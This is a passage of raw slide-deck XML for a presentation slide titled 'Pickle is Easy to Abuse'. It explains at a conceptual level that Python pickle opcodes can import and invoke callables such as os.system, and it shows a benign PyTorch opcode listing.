        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pickle is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to Abuse</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331725" y="1246725"/>
            <a:ext cx="3941100" cy="2835300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The pickle format is (too) expressive:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Google Shape;441;p38"/>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442" name="Google Shape;442;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504773" y="1246716"/>
            <a:ext cx="714000" cy="687000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="21625">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="103825" lIns="103825" spcFirstLastPara="1" rIns="103825" wrap="square" tIns="103825">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1589"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="443" name="Google Shape;443;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504773" y="1246702"/>
            <a:ext cx="714203" cy="686634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="444" name="Google Shape;444;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810771" y="1748466"/>
            <a:ext cx="510653" cy="476563"/>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8" name="Shape 448"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Google Shape;449;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pickle is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to Abuse</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331725" y="1246725"/>
            <a:ext cx="3941100" cy="2835300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The pickle format is (too) expressive:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Pickled objects are sequences of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t> opcodes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>executed by the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>“Pickle Machine”.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Google Shape;451;p39"/>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452" name="Google Shape;452;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504773" y="1246716"/>
            <a:ext cx="714000" cy="687000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="21625">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="103825" lIns="103825" spcFirstLastPara="1" rIns="103825" wrap="square" tIns="103825">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1589"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="453" name="Google Shape;453;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504773" y="1246702"/>
            <a:ext cx="714203" cy="686634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="454" name="Google Shape;454;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810771" y="1748466"/>
            <a:ext cx="510653" cy="476563"/>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8" name="Shape 458"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Google Shape;459;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pickle is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to Abuse</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331725" y="1246725"/>
            <a:ext cx="3941100" cy="2835300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The pickle format is (too) expressive:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Pickled objects are sequences of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t> opcodes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>executed by the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>“Pickle Machine”.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Opcodes can </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> Python </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>callables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> (functions or classes).</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="Google Shape;461;p40"/>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462" name="Google Shape;462;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4531750" y="2139600"/>
            <a:ext cx="4501200" cy="1741200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>IMPORT torch.FloatStorage</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>CREATE torch.FloatStorage.__new__</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>IMPORT torch.rebuild_tensor_v2</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>INVOKE torch.rebuild_tensor_v2(...)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504773" y="1246716"/>
            <a:ext cx="714000" cy="687000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="21625">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="103825" lIns="103825" spcFirstLastPara="1" rIns="103825" wrap="square" tIns="103825">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1589"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="464" name="Google Shape;464;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5504773" y="1246702"/>
            <a:ext cx="714203" cy="686634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="465" name="Google Shape;465;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810771" y="1748466"/>
            <a:ext cx="510653" cy="476563"/>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9" name="Shape 469"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pickle is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to Abuse</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Google Shape;471;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331725" y="1246725"/>
            <a:ext cx="3941100" cy="2835300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The pickle format is (too) expressive:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Pickled objects are sequences of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t> opcodes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>executed by the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>“Pickle Machine”.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Opcodes can </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> Python </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>callables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> (functions or classes).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Attackers can trivially import and invoke malicious callables, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;472;p41"/>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473" name="Google Shape;473;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4531750" y="2139600"/>
            <a:ext cx="4501200" cy="1741200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
